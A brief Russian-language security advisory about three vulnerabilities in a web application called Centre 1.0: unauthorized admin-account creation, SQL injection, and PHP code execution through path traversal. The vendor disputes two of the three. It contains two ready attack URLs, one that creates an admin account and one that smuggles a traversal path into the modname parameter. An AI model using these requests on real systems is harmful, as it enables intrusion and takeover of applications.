Программа: Centre 1.0 

Несколько уязвимостей в Centre позволяют удаленному пользователю выполнить SQL инъекцию и получить административный доступ к приложению. Производитель отрицает наличие 2х из 3х обнаруженных уязвимостей. 

1. Неавторизованный доступ: 

http://demo.miller-group.net/index.php?modfunc= create_account&staff&username=admin&staff_id=new

2. SQL инъекция в различных модулях.

3. Выполнение произвольного PHP кода: 

Modules.php?modname=../../../MyCode/Stuff.php

Оставить мнение